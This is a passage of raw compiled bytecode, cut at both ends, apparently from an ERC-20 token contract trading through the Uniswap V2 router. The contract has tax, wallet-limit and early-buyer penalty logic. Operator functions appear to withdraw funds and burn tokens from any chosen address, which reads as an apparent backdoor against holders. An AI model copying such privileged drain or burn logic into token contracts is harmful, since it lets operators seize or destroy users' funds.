2179055506000737a250d5630b4cf539739df2c5dacb4c659f2488d90508073ffffffffffffffffffffffffffffffffffffffff1660808173ffffffffffffffffffffffffffffffffffffffff16815250506001600e60006200049b62000bd860201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600e6000600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600e60003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600e6000737a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600e6000600c60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600e6000601660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600d600060805173ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600d60003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600d6000600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600d60003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600d6000600c60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600d6000601660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505062001169565b600033905090565b6000600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600560006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000add576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040162000ad490620010de565b60405180910390fd5b62000af16000838362000c0260201b60201c565b806002600082825462000b05919062001100565b92505081905550806000808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405162000bb891906200114c565b60405180910390a362000bd46000838362000c0760201b60201c565b5050565b6000600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b505050565b505050565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168062000c8e57607f821691505b60208210810362000ca45762000ca362000c46565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b60006008830262000d0e7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8262000ccf565b62000d1a868362000ccf565b95508019841693508086168417925050509392505050565b6000819050919050565b6000819050919050565b600062000d6762000d6162000d5b8462000d32565b62000d3c565b62000d32565b9050919050565b6000819050919050565b62000d838362000d46565b62000d9b62000d928262000d6e565b84845462000cdc565b825550505050565b600090565b62000db262000da3565b62000dbf81848462000d78565b505050565b5b8181101562000de75762000ddb60008262000da8565b60018101905062000dc5565b5050565b601f82111562000e365762000e008162000caa565b62000e0b8462000cbf565b8101602085101562000e1b578190505b62000e3362000e2a8562000cbf565b83018262000dc4565b50505b505050565b600082821c905092915050565b600062000e5b6000198460080262000e3b565b1980831691505092915050565b600062000e76838362000e48565b9150826002028217905092915050565b62000e918262000c0c565b67ffffffffffffffff81111562000ead5762000eac62000c17565b5b62000eb9825462000c75565b62000ec682828562000deb565b600060209050601f83116001811462000efe576000841562000ee9578287015190505b62000ef5858262000e68565b86555062000f65565b601f19841662000f0e8662000caa565b60005b8281101562000f385784890151825560018201915060208501945060208101905062000f11565b8683101562000f58578489015162000f54601f89168262000e48565b8355505b6001600288020188555050505b505050505050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600062000fa98262000d32565b915062000fb68362000d32565b925082820262000fc68162000d32565b9150828204841483151762000fe05762000fdf62000f6d565b5b5092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b6000620010238262000d32565b9150620010308362000d32565b92508262001043576200104262000fe7565b5b828204905092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602160045260246000fd5b600082825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b6000620010c6601f836200107d565b9150620010d3826200108e565b602082019050919050565b60006020820190508181036000830152620010f981620010b7565b9050919050565b60006200110d8262000d32565b91506200111a8362000d32565b925082820190508082111562001135576200113462000f6d565b5b92915050565b620011468162000d32565b82525050565b60006020820190506200116360008301846200113b565b92915050565b608051613c73620011b6600039600081816109a901528181610a0e01528181610ab901528181610bec01528181610c33015281816127570152818161285001526128f30152613c736000f3fe6080604052600436106102085760003560e01c80636225658911610118578063a9059cbb116100a0578063dd62ed3e1161006f578063dd62ed3e1461075f578063e5b37a651461079c578063f2fde38b146107d9578063fb201b1d14610802578063fca675a8146108195761020f565b8063a9059cbb146106a3578063aa4bde28146106e0578063b61b64fa1461070b578063cf865f7f146107365761020f565b80638c0b5e22116100e75780638c0b5e22146105ba5780638da5cb5b146105e557806395d89b4114610610578063a014f37d1461063b578063a457c2d7146106665761020f565b8063622565891461051257806370a0823114610529578063715018a6146105665780638baa82491461057d5761020f565b80632f396cee1161019b578063395093511161016a578063395093511461042b5780633eb5d9b21461046857806349bd5a5e1461049357806349df728c146104be57806354b762a6146104e75761020f565b80632f396cee1461038e5780632fee9e7e14610398578063313ce567146103d557806333ee1793146104005761020f565b8063095ea7b3116101d7578063095ea7b3146102be5780631694505e146102fb57806318160ddd1461032657806323b872dd146103515761020f565b806303fd2a45146102145780630445b6671461023f57806306fdde031461026a5780630828c1dd146102955761020f565b3661020f57005b600080fd5b34801561022057600080fd5b50610229610844565b60405161023691906129ca565b60405180910390f35b34801561024b57600080fd5b5061025461086a565b60405161026191906129fe565b60405180910390f35b34801561027657600080fd5b5061027f610870565b60405161028c9190612aa9565b60405180910390f35b3480156102a157600080fd5b506102bc60048036038101906102b79190612afc565b610902565b005b3480156102ca57600080fd5b506102e560048036038101906102e09190612b55565b610984565b6040516102f29190612bb0565b60405180910390f35b34801561030757600080fd5b506103106109a7565b60405161031d9190612c2a565b60405180910390f35b34801561033257600080fd5b5061033b6109cb565b60405161034891906129fe565b60405180910390f35b34801561035d57600080fd5b5061037860048036038101906103739190612c45565b6109d5565b6040516103859190612bb0565b60405180910390f35b610396610a04565b005b3480156103a457600080fd5b506103bf60048036038101906103ba9190612afc565b610ced565b6040516103cc9190612bb0565b60405180910390f35b3480156103e157600080fd5b506103ea610d0d565b6040516103f79190612cb4565b60405180910390f35b34801561040c57600080fd5b50610415610d16565b60405161042291906129fe565b60405180910390f35b34801561043757600080fd5b50610452600480360381019061044d9190612b55565b610d1c565b60405161045f9190612bb0565b60405180910390f35b34801561047457600080fd5b5061047d610d53565b60405161048a91906129fe565b60405180910390f35b34801561049f57600080fd5b506104a8610d59565b6040516104b591906129ca565b60405180910390f35b3480156104ca57600080fd5b506104e560048036038101906104e09190612afc565b610d7f565b005b3480156104f357600080fd5b506104fc610ea4565b6040516105099190612bb0565b60405180910390f35b34801561051e57600080fd5b50610527610f20565b005b34801561053557600080fd5b50610550600480360381019061054b9190612afc565b610f50565b60405161055d91906129fe565b60405180910390f35b34801561057257600080fd5b5061057b610f98565b005b34801561058957600080fd5b506105a4600480360381019061059f9190612afc565b610fac565b6040516105b19190612bb0565b60405180910390f35b3480156105c657600080fd5b506105cf610fcc565b6040516105dc91906129fe565b60405180910390f35b3480156105f157600080fd5b506105fa610fd2565b60405161060791906129ca565b60405180910390f35b34801561061c57600080fd5b50610625610ffc565b6040516106329190612aa9565b60405180910390f35b34801561064757600080fd5b5061065061108e565b60405161065d9190612bb0565b60405180910390f35b34801561067257600080fd5b5061068d60048036038101906106889190612b55565b6110da565b60405161069a9190612bb0565b60405180910390f35b3480156106af57600080fd5b506106ca60048036038101906106c59190612b55565b611151565b6040516106d79190612bb0565b60405180910390f35b3480156106ec57600080fd5b506106f5611174565b60405161070291906129fe565b60405180910390f35b34801561071757600080fd5b5061072061117a565b60405161072d91906129fe565b60405180910390f35b34801561074257600080fd5b5061075d60048036038101906107589190612cfb565b611180565b005b34801561076b57600080fd5b5061078660048036038101906107819190612d3b565b6111e3565b60405161079391906129fe565b60405180910390f35b3480156107a857600080fd5b506107c360048036038101906107be9190612afc565b61126a565b6040516107d09190612bb0565b60405180910390f35b3480156107e557600080fd5b5061080060048036038101906107fb9190612afc565b61128a565b005b34801561080e57600080fd5b5061081761130d565b005b34801561082557600080fd5b5061082e61139d565b60405161083b9190612df2565b60405180910390f35b600c60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b600b5481565b60606003805461087f90612e3c565b80601f01602080910402602001604051908101604052809291908181526020018280546108ab90612e3c565b80156108f85780601f106108cd576101008083540402835291602001916108f8565b820191906000526020600020905b8154815290600101906020018083116108db57829003601f168201915b5050505050905090565b61090a6113b0565b6000600e60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506109818160145461097284610f50565b61097c9190612e9c565b611449565b50565b60008061098f611616565b905061099c81858561161e565b600191505092915050565b7f000000000000000000000000000000000000000000000000000000000000000081565b6000600254905090565b6000806109e0611616565b90506109ed8582856117e7565b6109f8858585611873565b60019150509392505050565b610a0c61222d565b7f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff1663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa158015610a77573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610a9b9190612ee5565b73ffffffffffffffffffffffffffffffffffffffff1663c9c65396307f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015610b22573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610b469190612ee5565b6040518363ffffffff1660e01b8152600401610b63929190612f12565b6020604051808303816000875af1158015610b82573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610ba69190612ee5565b601560006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550610c31307f00000000000000000000000000000000000000000000000000000000000000007fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff61161e565b7f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff1663f305d7193430610c7830610f50565b600080610c83610fd2565b426040518863ffffffff1660e01b8152600401610ca596959493929190612f76565b60606040518083038185885af1158015610cc3573d6000803e3d6000fd5b50505050506040513d601f19601f82011682018060405250810190610ce89190612fec565b505050565b600e6020528060005260406000206000915054906101000a900460ff1681565b60006012905090565b60125481565b600080610d27611616565b9050610d48818585610d3985896111e3565b610d43919061303f565b61161e565b600191505092915050565b60115481565b601560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b610d8761222d565b8073ffffffffffffffffffffffffffffffffffffffff1663a9059cbb600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff166370a08231306040518263ffffffff1660e01b8152600401610dff91906129ca565b602060405180830381865afa158015610e1c573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610e409190613073565b6040518363ffffffff1660e01b8152600401610e5d9291906130a0565b6020604051808303816000875af1158015610e7c573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610ea091906130de565b5050565b6000600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff166108fc6017549081150290604051600060405180830381858888f19350505050158015610f10573d6000803e3d6000fd5b5060006017819055506001905090565b610f2861222d565b6b033b2e3c9fd0803ce80000006009819055506b033b2e3c9fd0803ce8000000600a81905550565b60008060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b610fa061222d565b610faa60006122ab565b565b600f6020528060005260406000206000915054906101000a900460ff1681565b60095481565b6000600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606004805461100b90612e3c565b80601f016020809104026020016040519081016040528092919081815260200182805461103790612e3c565b80156110845780601f1061105957610100808354040283529160200191611084565b820191906000526020600020905b81548152906001019060200180831161106757829003601f168201915b5050505050905090565b600061109861222d565b6003601060006101000a81548160ff021916908360038111156110be576110bd612d7b565b5b0217905550600060118190555060006012819055506001905090565b6000806110e5611616565b905060006110f382866111e3565b905083811015611138576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161112f9061317d565b60405180910390fd5b611145828686840361161e565b60019250505092915050565b60008061115c611616565b9050611169818585611873565b600191505092915050565b600a5481565b60175481565b61118861222d565b80600e60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505050565b6000600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b600d6020528060005260406000206000915054906101000a900460ff1681565b61129261222d565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603611301576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016112f89061320f565b60405180910390fd5b61130a816122ab565b50565b61131561222d565b601060029054906101000a900460ff1615611365576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161135c9061327b565b60405180910390fd5b6001601060026101000a81548160ff0219169083151502179055506001601060036101000a81548160ff021916908315150217905550565b601060009054906101000a900460ff1681565b600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff166113f1611616565b73ffffffffffffffffffffffffffffffffffffffff1614611447576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161143e9061330d565b60405180910390fd5b565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036114b8576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016114af9061339f565b60405180910390fd5b6114c482600083612371565b60008060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205490508181101561154a576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161154190613431565b60405180910390fd5b8181036000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600260008282540392505081905550600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516115fd91906129fe565b60405180910390a361161183600084612376565b505050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361168d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611684906134c3565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036116fc576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016116f390613555565b60405180910390fd5b80600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925836040516117da91906129fe565b60405180910390a3505050565b60006117f384846111e3565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff811461186d578181101561185f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611856906135c1565b60405180910390fd5b61186c848484840361161e565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036118e2576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016118d990613653565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611951576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611948906136e5565b60405180910390fd5b600d60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff161580156119f55750600d60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b15611a4a57601060029054906101000a900460ff16611a49576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611a4090613751565b60405180910390fd5b5b600e60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16158015611aee5750600e60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b15611be757601560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614611be657600954811115611b8d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611b84906137e3565b60405180910390fd5b600a54611b9983610f50565b82611ba4919061303f565b1115611be5576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611bdc90613875565b60405180910390fd5b5b5b6000819050600d60008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16158015611c905750600d60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b1561221c57601560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff161480611d3e5750601560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16145b1561212e57600954821115611d88576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611d7f90613907565b60405180910390fd5b8373ffffffffffffffffffffffffffffffffffffffff16601560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16148015611e2f5750600e60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b8015611e6757503073ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614155b15611f395760006003811115611e8057611e7f612d7b565b5b601060009054906101000a900460ff166003811115611ea257611ea1612d7b565b5b03611f00576001600f60008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505b6000606460115484611f129190613927565b611f1c9190613998565b9050611f2985308361237b565b8083611f359190612e9c565b9150505b8273ffffffffffffffffffffffffffffffffffffffff16601560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16148015611fe05750600e60008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b801561201857503073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614155b80156120305750601060039054906101000a900460ff165b80156120495750601060019054906101000a900460ff16155b15612129576000601254905060011515600f60008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff161515036120b35760135490505b6001601060016101000a81548160ff0219169083151502179055506120d66125f1565b6000601060016101000a81548160ff0219169083151502179055506000606482856121019190613927565b61210b9190613998565b905061211886308361237b565b80846121249190612e9c565b925050505b61221b565b60011515600f60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1615151480156121dc57508273ffffffffffffffffffffffffffffffffffffffff16601560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614155b1561221a5760006064601354846121f39190613927565b6121fd9190613998565b905061220a85308361237b565b80836122169190612e9c565b9150505b5b5b61222784848361237b565b50505050565b612235611616565b73ffffffffffffffffffffffffffffffffffffffff16612253610fd2565b73ffffffffffffffffffffffffffffffffffffffff16146122a9576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016122a090613a15565b60405180910390fd5b565b6000600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600560006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b505050565b505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036123ea576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016123e190613653565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603612459576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612450906136e5565b60405180910390fd5b612464838383612371565b60008060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050818110156124ea576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016124e190613aa7565b60405180910390fd5b8181036000808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550816000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516125d891906129fe565b60405180910390a36125eb848484612376565b50505050565b60006125fc30610f50565b03156126b65760008061260e30610f50565b905060004790506000612642600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16610f50565b90506000600b548411156126b05747925061265e8460006126b8565b824761266a9190612e9c565b9450600b548211156126965780612682576000612684565b845b8561268f9190613998565b6017819055505b84601760008282546126a8919061303f565b925050819055505b50505050505b565b6000600267ffffffffffffffff8111156126d5576126d4613ac7565b5b6040519080825280602002602001820160405280156127035781602001602082028036833780820191505090505b509050308160008151811061271b5761271a613af6565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff16815250507f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156127c0573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906127e49190612ee5565b816001815181106127f8576127f7613af6565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff16815250503073ffffffffffffffffffffffffffffffffffffffff1663095ea7b37f00000000000000000000000000000000000000000000000000000000000000007fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff6040518363ffffffff1660e01b81526004016128ad9291906130a0565b6020604051808303816000875af11580156128cc573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906128f091906130de565b507f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff1663791ac94784848430426040518663ffffffff1660e01b8152600401612952959493929190613be3565b600060405180830381600087803b15801561296c57600080fd5b505af1158015612980573d6000803e3d6000fd5b50505050505050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006129b482612989565b9050919050565b6129c4816129a9565b82525050565b60006020820190506129df60008301846129bb565b92915050565b6000819050919050565b6129f8816129e5565b82525050565b6000602082019050612a1360008301846129ef565b92915050565b600081519050919050565b600082825260208201905092915050565b60005b83811015612a53578082015181840152602081019050612a38565b60008484015250505050565b6000601f19601f8301169050919050565b6000612a7b82612a19565b612a858185612a24565b9350612a95818560208601612a35565b612a9e81612a5f565b840191505092915050565b60006020820190508181036000830152612ac38184612a70565b905092915050565b600080fd5b612ad9816129a9565b8114612ae457600080fd5b50565b600081359050612af681612ad0565b92915050565b600060208284031215612b1257612b11612acb565b5b6000612b2084828501612ae7565b91505092915050565b612b32816129e5565b8114612b3d57600080fd5b50565b600081359050612b4f81612b29565b92915050565b60008060408385031215612b6c57612b6b612acb565b5b6000612b7a85828601612ae7565b9250506020612b8b85828601612b40565b9150509250929050565b60008115159050919050565b612baa81612b95565b82525050565b6000602082019050612bc56000830184612ba1565b92915050565b6000819050919050565b6000612bf0612beb612be684612989565b612bcb565b612989565b9050919050565b6000612c0282612bd5565b9050919050565b6000612c1482612bf7565b9050919050565b612c2481612c09565b82525050565b6000602082019050612c3f6000830184612c1b565b92915050565b600080600060608486031215612c5e57612c5d612acb565b5b6000612c6c86828701612ae7565b9350506020612c7d86828701612ae7565b9250506040612c8e86828701612b40565b9150509250925092565b600060ff82169050919050565b612cae81612c98565b82525050565b6000602082019050612cc96000830184612ca5565b92915050565b612cd881612b95565b8114612ce357600080fd5b50565b600081359050612cf581612ccf565b92915050565b60008060408385031215612d1257612d11612acb565b5b6000612d2085828601612ae7565b9250506020612d3185828601612ce6565b9150509250929050565b60008060408385031215612d5257612d51612acb565b5b6000612d6085828601612ae7565b9250506020612d7185828601612ae7565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602160045260246000fd5b60048110612dbb57612dba612d7b565b5b50565b6000819050612dcc82612daa565b919050565b6000612ddc82612dbe565b9050919050565b612dec81612dd1565b82525050565b6000602082019050612e076000830184612de3565b92915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b60006002820490506001821680612e5457607f821691505b602082108103612e6757612e66612e0d565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b6000612ea7826129e5565b9150612eb2836129e5565b9250828203905081811115612eca57612ec9612e6d565b5b92915050565b600081519050612edf81612ad0565b92915050565b600060208284031215612efb57612efa612acb565b5b6000612f0984828501612ed0565b91505092915050565b6000604082019050612f2760008301856129bb565b612f3460208301846129bb565b9392505050565b6000819050919050565b6000612f60612f5b612f5684612f3b565b612bcb565b6129e5565b9050919050565b612f7081612f45565b82525050565b600060c082019050612f8b60008301896129bb565b612f9860208301886129ef565b612fa56040830187612f67565b612fb26060830186612f67565b612fbf60808301856129bb565b612fcc60a08301846129ef565b979650505050505050565b600081519050612fe681612b29565b92915050565b60008060006060848603121561300557613004612acb565b5b600061301386828701612fd7565b935050602061302486828701612fd7565b925050604061303586828701612fd7565b9150509250925092565b600061304a826129e5565b9150613055836129e5565b925082820190508082111561306d5761306c612e6d565b5b92915050565b60006020828403121561308957613088612acb565b5b600061309784828501612fd7565b91505092915050565b60006040820190506130b560008301856129bb565b6130c260208301846129ef565b9392505050565b6000815190506130d881612ccf565b92915050565b6000602082840312156130f4576130f3612acb565b5b6000613102848285016130c9565b91505092915050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b6000613167602583612a24565b91506131728261310b565b604082019050919050565b600060208201905081810360008301526131968161315a565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b60006131f9602683612a24565b91506132048261319d565b604082019050919050565b60006020820190508181036000830152613228816131ec565b9050919050565b7f54726164696e6720697320616c726561647920656e61626c6564000000000000600082015250565b6000613265601a83612a24565b91506132708261322f565b602082019050919050565b6000602082019050818103600083015261329481613258565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f7065726160008201527f746f720000000000000000000000000000000000000000000000000000000000602082015250565b60006132f7602383612a24565b91506133028261329b565b604082019050919050565b60006020820190508181036000830152613326816132ea565b9050919050565b7f45524332303a206275726e2066726f6d20746865207a65726f2061646472657360008201527f7300000000000000000000000000000000000000000000000000000